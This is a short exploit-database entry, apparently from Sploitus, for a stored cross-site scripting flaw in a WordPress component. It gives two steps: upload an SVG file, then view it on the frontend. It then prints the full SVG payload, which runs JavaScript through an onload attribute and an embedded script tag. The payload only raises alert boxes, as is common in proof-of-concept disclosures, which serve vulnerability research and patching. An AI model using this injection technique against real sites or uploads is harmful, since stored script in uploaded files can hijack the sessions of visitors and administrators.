Share
## https://sploitus.com/exploit?id=WPEX-ID:91898762-AA7D-4FBC-A016-3DE48901E5DE
1. Upload an SVG file with the following contents.
2. View the SVG file on the frontend and see the alerts.

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg
   onload="javascript:alert(/XSS/)"
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:cc="http://creativecommons.org/ns#"
   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
   xmlns:svg="http://www.w3.org/2000/svg"
   xmlns="http://www.w3.org/2000/svg"
   xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd"
   xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
   id="svg3013"
   sodipodi:docname="download_font_awesome.svg">
<script>alert(/XSS2/)</script>
</svg>